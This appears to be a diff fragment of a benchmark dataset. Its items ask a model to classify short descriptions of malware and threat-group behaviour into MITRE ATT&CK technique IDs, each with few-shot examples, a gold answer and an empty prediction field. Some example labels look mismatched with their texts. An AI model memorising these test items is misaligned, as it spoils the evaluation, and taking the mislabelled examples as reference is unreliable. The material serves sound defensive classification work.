"predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: has used a tool known as RemoteExec (similar to ) to remotely execute batch scripts and binaries.\n\t - T1569.002: System Services - Service Execution\n- Text: APT38 has used rundll32.exe to execute binaries, scripts, and Control Panel Item files and to execute code via proxy to avoid triggering security tools.\n\t - T1218.011: System Binary Proxy Execution - Rundll32\n- Text: can be added as a service to establish persistence.\n\t - T1543.003: Create or Modify System Process - Windows Service\n", + "input": "NotPetya uses \"rundll32.exe\" to install itself on remote systems when accessed via PsExec or \"wmic\".", + "gold": "- T1218.011: System Binary Proxy Execution - Rundll32", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Cobalt Group has sent emails containing malicious attachments that require users to execute a file or macro to infect the victim machine.\n\t - T1204.002: User Execution - Malicious File\n- Text: Hancitor has been delivered via phishing emails with malicious attachments.\n\t - T1566.001: Phishing - Spearphishing Attachment\n- Text: Frankenstein has used trojanized documents that retrieve remote templates from an adversary-controlled website.\n\t - T1221: Template Injection\n", + "input": "DarkHydrus has sent malware that required users to hit the enable button in Microsoft Excel to allow an .iqy file to be downloaded.", + "gold": "- T1204.002: User Execution - Malicious File", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Wizard Spider has used macros to execute PowerShell scripts to download malware on victim's machines. It has also used PowerShell to execute commands and move laterally through a victim network.\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n- Text: menuPass has used \"InstallUtil.exe\" to execute malicious software.\n\t - T1218.004: System Binary Proxy Execution - InstallUtil\n- Text: Clambling can execute binaries through process hollowing.\n\t - T1055.012: Process Injection - Process Hollowing\n", + "input": "Saint Bot has used PowerShell for execution.", + "gold": "- T1059.001: Command and Scripting Interpreter - PowerShell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: WastedLocker can execute itself as a service.\n\t - T1569.002: System Services - Service Execution\n- Text: Green Lambert has been disguised as a Growl help file.\n\t - T1036.005: Masquerading - Match Legitimate Name or Location\n- Text: TinyZBot can create a shortcut in the Windows startup folder for persistence.\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n\t - T1547.009: Boot or Logon Autostart Execution - Shortcut Modification\n", + "input": "Bad Rabbit drops a file named \"infpub.dat\"into the Windows directory and is executed through SCManager and \"rundll.exe\".", + "gold": "- T1569.002: System Services - Service Execution", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: HAWKBALL has encrypted data with XOR before sending it over the C2 channel.\n\t - T1560.003: Archive Collected Data - Archive via Custom Method\n- Text: The original variant of FakeM encrypts C2 traffic using a custom encryption cipher that uses an XOR key of \u201cYHCRA\u201d and bit rotation between each XOR operation. Some variants of FakeM use RC4 to encrypt C2 traffic.\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n- Text: The operators used the HyperBro Trojan as their last-stage in-memory remote administration tool (RAT). The timestamps for these modules are from December 2017 until January 2018. The anti-detection launcher and decompressor make extensive use of Metasploit\u2019s shikata_ga_nai encoder as well as LZNT1 compression\n\t - T1027: Obfuscated Files or Information\n", + "input": "A Lazarus Group malware sample encrypts data using a simple byte based XOR operation prior to exfiltration.", + "gold": "- T1560.003: Archive Collected Data - Archive via Custom Method", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: SeaDuke C2 traffic has been encrypted with RC4 and AES.\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n- Text: A much more advanced and highly obfuscated Javascript script was utilized in White Atlas samples that dropped a Firefox extension backdoor developed by Turla, but again the script was responsible for the simple tasks of writing out the extension.json configuration file for the extension and deleting itself for cleanup purposes\n\t - T1070.004: Indicator Removal - File Deletion\n\t - T1064: Scripting\n\t - T1027: Obfuscated Files or Information\n- Text: OwaAuth DES-encrypts captured credentials using the key 12345678 before writing the credentials to a log file.\n\t - T1560.003: Archive Collected Data - Archive via Custom Method\n", + "input": "Fysbis has been encrypted using XOR and RC4.", + "gold": "- T1027: Obfuscated Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Crimson RAT can steal credentials from browsers, collect antivirus information, capture screenshots, and list victim drives, processes, and directories. We have observed how an infected host communicates with a Crimson RAT C&C server to send exfiltrated information including PC name, operating system (OS) information, and the location of the Crimson RAT malware inside the system.\n\t - T1592: Gather Victim Host Information\n\t - T1589: Gather Victim Identity Information\n\t - T1590: Gather Victim Network Information\n\t - T1125: Video Capture\n\t - T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n\t - T1056: Input Capture\n\t - T1113: Screen Capture\n\t - T1003: OS Credential Dumping\n- Text: When executing the code, the browser creates an invisible image tag and sets the URL to an attack server using the file:// protocol scheme. On Windows machines, this triggers a request to a remote server via the Samba networking protocol (SMB) that also transmits the user\u2019s login NTLM hash. These hashes can be cracked to retrieve the original login password by methods of brute-force, dictionary, or rainbow table lookups\n\t - T1003.004: OS Credential Dumping - LSA Secrets\n\t - T1552.001: Unsecured Credentials - Credentials In Files\n\t - T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n\t - T1003.005: OS Credential Dumping - Cached Domain Credentials\n\t - T1555: Credentials from Password Stores\n\t - T1003.001: OS Credential Dumping - LSASS Memory\n- Text: To ensure its victim will use IE, it will terminate any process in-focus that is Chrome or Firefox, in hopes the victim will believe the browsers are \u201cmalfunctioning.\u201d Whenever a victim uses IE and browses to specific Brazilian banks or businesses, the malware will only then begin to log keystrokes\n\t - T1552.001: Unsecured Credentials - Credentials In Files\n", + "input": "Leafminer used Microsoft\u2019s Sysinternals tools to gather detailed information about remote systems.", + "gold": "- T1018: Remote System Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: During Operation Wocao, threat actors used the command `net localgroup administrators` to list all administrators part of a local group.\n\t - T1069.001: Permission Groups Discovery - Local Groups\n- Text: Commands under \"net user\" can be used in Net to gather information about and manipulate user accounts.\n\t - T1087.001: Account Discovery - Local Account\n- Text: If the user account doesn\u2019t have local administrative or domain administrative permissions, the adversary attempts to discover which local or domain admin accounts exist, and exfiltrates the admin\u2019s usernames. To identify if privileged users are active on remote servers, the adversary makes use of PsLogList from Microsoft Sysinternals to retrieve the Security event logs. The built-in Windows quser-command to show logged on users is also heavily used by them. If such a privileged user was recently active on a server the adversary executes Cobalt Strike\u2019s built-in Mimikatz to dump its password hashes\n\t - T1087.002: Account Discovery - Domain Account\n", + "input": "HEXANE has run `net localgroup` to enumerate local groups.", + "gold": "- T1069.001: Permission Groups Discovery - Local Groups", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: can create a shortcut in the Windows startup folder for persistence.\n\t - T1547.009: Boot or Logon Autostart Execution - Shortcut Modification\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: The adversaries installed the backdoor as a service on the infected machine. They attempted to operate under the radar by naming the service \"Windows Time Service\", like the existing Windows service\n\t - T1036.004: Masquerading - Masquerade Task or Service\n- Text: appears to have functionality to modify remote Registry information.\n\t - T1112: Modify Registry\n", + "input": "RTM tries to add a Registry Run key under the name \"Windows Update\" to establish persistence.", + "gold": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: ThiefQuest uses a function named \"is_debugging\" to perform anti-debugging logic. The function invokes \"sysctl\" checking the returned value of \"P_TRACED\". ThiefQuest also calls \"ptrace\" with the \"PTRACE_DENY_ATTACH\" flag to prevent debugging.\n\t - T1622: Debugger Evasion\n- Text: The winupdate.ps1 script (SHA256: 36862f654c3356d2177b5d35a410c78ff9803d1d7d20da0b82e3d69d640e856e) is the main payload of this attack that we call RogueRobin. Its developer used the open source Invoke-Obfuscation tool to obfuscate this PowerShell script, specifically using the COMPRESS technique offered by Invoke-Obfuscation. Before carrying out any of its functionality the payload checks to see if it is executing in a sandbox. The payload uses WMI queries and checks running processes for evidence that the script may be executing within an analysis environment. The specific sandbox checks include\n\t - T1047: Windows Management Instrumentation\n\t - T1497.001: Virtualization/Sandbox Evasion - System Checks\n\t - T1057: Process Discovery\n- Text: SDBbot has the ability to use image file execution options for persistence if it detects it is running with admin privileges on a Windows version newer than Windows 7.\n\t - T1546.012: Event Triggered Execution - Image File Execution Options Injection\n", + "input": "DRATzarus can use `IsDebuggerPresent` to detect whether a debugger is present on a victim.", + "gold": "- T1622: Debugger Evasion", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: ChChes establishes persistence by adding a Registry Run key.\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: Further collaboration between FireEye as a Service (FaaS), Mandiant and FireEye iSIGHT intelligence uncovered additional victims worldwide, a new suite of tools and novel techniques\n\t - T1543: Create or Modify System Process\n\t - T1543.003: Create or Modify System Process - Windows Service\n- Text: APT39 has used malware to set \"LoadAppInit_DLLs\" in the Registry key \"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\" in order to establish persistence.\n\t - T1546.010: Event Triggered Execution - AppInit DLLs\n", + "input": "Rover persists by creating a Registry entry in \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\\".", + "gold": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: AppleSeed can collect data on a compromised host.\n\t - T1005: Data from Local System\n- Text: Get2 has the ability to identify the current username of an infected host.\n\t - T1033: System Owner/User Discovery\n- Text: VERMIN collects data stored in the clipboard.\n\t - T1115: Clipboard Data\n", + "input": "RCSession can collect data from a compromised host.", + "gold": "- T1005: Data from Local System", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Pillowmint has been decompressed by included shellcode prior to being launched.\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: Reg may be used to find credentials in the Windows Registry.\n\t - T1552.002: Unsecured Credentials - Credentials in Registry\n- Text: Kevin can create directories to store logs and other collected data.\n\t - T1074: Data Staged\n", + "input": "TrickBot decodes the configuration data and modules.", + "gold": "- T1140: Deobfuscate/Decode Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Sibot has queried the registry for proxy server information.\n\t - T1012: Query Registry\n- Text: Gazer can establish persistence by setting the value \u201cShell\u201d with \u201cexplorer.exe, %malware_pathfile%\u201d under the Registry key \"HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\".\n\t - T1547.004: Boot or Logon Autostart Execution - Winlogon Helper DLL\n- Text: Cobalt Strike can recover hashed passwords.\n\t - T1003.002: OS Credential Dumping - Security Account Manager\n", + "input": "Zebrocy executes the \"reg query\" command to obtain information in the Registry.", + "gold": "- T1012: Query Registry", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Once a removable media device is inserted back into the first victim, USBStealer collects data from it that was exfiltrated from a second victim.\n\t - T1025: Data from Removable Media\n- Text: MESSAGETAP checks two files, keyword_parm.txt and parm.txt, for instructions on how to target and save data parsed and extracted from SMS message data from the network traffic. If an SMS message contained either a phone number, IMSI number, or keyword that matched the predefined list, it is saved to a CSV file for later theft by the threat actor.\n\t - T1119: Automated Collection\n- Text: During C0015, the threat actors obtained files and data from the compromised network.\n\t - T1005: Data from Local System\n", + "input": "FLASHFLOOD searches for interesting files (either a default or customized set of file extensions) on the local system and removable media.", + "gold": "- T1083: File and Directory Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: To facilitate the staging of BEACON on remote systems APT29 utilized a malicious certificate that allowed the group to impersonate a privileged user.\n\t - T1588.004: Obtain Capabilities - Digital Certificates\n- Text: Proofpoint researchers frequently observe Silent Librarian\u2019s phishing attempts originating from a university unrelated to their current target using a separate, unrelated university\u2019s URL shortening service. This short URL links to a phishing landing page either directly or via one or more third-party sites that eventually lands the user on a clone of a login portal hosted on an actor-controlled server\n\t - T1588.002: Obtain Capabilities - Tool\n\t - T1598.003: Phishing for Information - Spearphishing Link\n\t - T1608.005: Stage Capabilities - Link Target\n- Text: Kimsuky has searched for information on the target company's website.\n\t - T1594: Search Victim-Owned Websites\n", + "input": "Silent Librarian has obtained free Let's Encrypt SSL certificates for use on their phishing pages.", + "gold": "- T1588.004: Obtain Capabilities - Digital Certificates", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: TEARDROP is a memory only dropper that runs as a service, spawns a thread and reads from the file \u201cgracious_truth.jpg\u201d, which likely has a fake JPG header. Next it checks that HKU\\SOFTWARE\\Microsoft\\CTF exists, decodes an embedded payload using a custom rolling XOR algorithm and manually loads into memory an embedded payload using a custom PE-like file format. TEARDROP does not have code overlap with any previously seen malware. We believe that this was used to execute a customized Cobalt Strike BEACON\n\t - T1027: Obfuscated Files or Information\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: can load a DLL using the LoadLibrary API.\n\t - T1129: Shared Modules\n- Text: has used Metasploit to perform reflective DLL injection in order to escalate privileges.\n\t - T1055: Process Injection\n", + "input": "Starloader decrypts and executes shellcode from a file called Stars.jps.", + "gold": "- T1140: Deobfuscate/Decode Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: CrackMapExec can set a scheduled task on the target system to execute commands remotely using at.\n\t - T1053.002: Scheduled Task/Job - At\n- Text: UNC2452 used 7-Zip to compress stolen emails into password-protected archives prior to exfiltration.\n\t - T1560.001: Archive Collected Data - Archive via Utility\n- Text: FIN6 has used scheduled tasks to establish persistence for various malware it uses, including downloaders known as HARDTACK and SHIPBREAD and FrameworkPOS.\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n", + "input": "Threat Group-3390 actors use at to schedule tasks to run self-extracting RAR archives, which install HTTPBrowser or PlugX on other victims on a network.", + "gold": "- T1053.002: Scheduled Task/Job - At", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: GrimAgent has used \"Accept-Language\" to identify hosts in the United Kingdom, United States, France, and Spain.\n\t - T1614.001: System Location Discovery - System Language Discovery\n- Text: Crimson can identify the geographical location of a victim host.\n\t - T1614: System Location Discovery\n- Text: SILENTTRINITY has the ability to leverage API including `GetProcAddress` and `LoadLibrary`.\n\t - T1106: Native API\n", + "input": "S-Type has attempted to determine if a compromised system was using a Japanese keyboard via the `GetKeyboardType` API call.", + "gold": "- T1614.001: System Location Discovery - System Language Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The \"net start\" and \"net stop\" commands can be used in Net to execute or stop Windows services.\n\t - T1569.002: System Services - Service Execution\n- Text: Using this example, Comnie will then request data to supply to the BAT script, via the following decrypted request: h=HOSTNAME-PC&f=gethostinfo.bat&c=& Based on network traffic witnessed, the remote C2 server was found to respond with the following information: netstat -ano > %TEMP%\\info.datipconfig /all >> %TEMP%\\info.datroute PRINT >> %TEMP%\\info.datnet view >> %TEMP%\\info.dattasklist >> %TEMP%\\info.datnet user >> %TEMP%\\info.datnet start >> %TEMP%\\info.dat This script is written to a temporary file prior to be executed\n\t - T1007: System Service Discovery\n- Text: Bankshot can terminate a specific process by its process id.\n\t - T1543.003: Create or Modify System Process - Windows Service\n", + "input": "Clambling can create and start services on a compromised host.", + "gold": "- T1569.002: System Services - Service Execution", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: has the capability to delete files off the victim\u2019s machine.\n\t - T1070.004: Indicator Removal - File Deletion\n- Text: BlackEnergy 2 contains a \"Destroy\" plug-in that destroys data stored on victim hard drives by overwriting file contents.\n\t - T1485: Data Destruction\n- Text: The default case when the service tag is empty allows the malware to treat the contents of the response from the C2 as a command to execute via the Go library functions os.exec.Command or os.exec.Start. The format of the received command is checked against the below regex pattern for validity before executing and the command is read from the body of the message received from the C2\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n", + "input": "Denis has a command to delete files from the victim\u2019s machine.", + "gold": "- T1070.004: Indicator Removal - File Deletion", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Decrypted Config: C&C IP: 192.168.0.107 Port: 80 Sleep Timer: 30000 Campaign Identifier: Mirage If you look at it the decrypted configuration, you may notice that the IP being used for the C&C is an internal IP address\n\t - T1140: Deobfuscate/Decode Files or Information\n\t - T1016: System Network Configuration Discovery\n- Text: Fox Kitten has used Angry IP Scanner to detect remote systems.\n\t - T1018: Remote System Discovery\n- Text: No matching sample found for T1557.002\n", + "input": "Arp can be used to display ARP configuration information on the host.", + "gold": "- T1016: System Network Configuration Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Dok proxies web traffic to potentially monitor and alter victim HTTP(S) traffic.\n\t - T1557: Adversary-in-the-Middle\n- Text: NanoCore can modify the victim's firewall.\n\t - T1562.004: Impair Defenses - Disable or Modify System Firewall\n- Text: RGDoor establishes persistence on webservers as an IIS module.\n\t - T1505.004: Server Software Component - IIS Components\n", + "input": "Kimsuky has used modified versions of PHProxy to examine web traffic between the victim and the accessed website.", + "gold": "- T1557: Adversary-in-the-Middle", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Epic uses the \"rem reg query\" command to obtain values from Registry keys.\n\t - T1012: Query Registry\n- Text: Wizard Spider has established persistence using Userinit by adding the Registry key HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon.\n\t - T1547.004: Boot or Logon Autostart Execution - Winlogon Helper DLL\n- Text: Darkhotel has searched for anti-malware strings and anti-virus processes running on the system.\n\t - T1518.001: Software Discovery - Security Software Discovery\n", + "input": "Chimera has queried Registry keys using \"reg query \\\\\\HKU\\\\SOFTWARE\\Microsoft\\Terminal Server Client\\Servers\" and \"reg query \\\\\\HKU\\\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\".", + "gold": "- T1012: Query Registry", + "predicted": "" + } +] \ No newline at end of file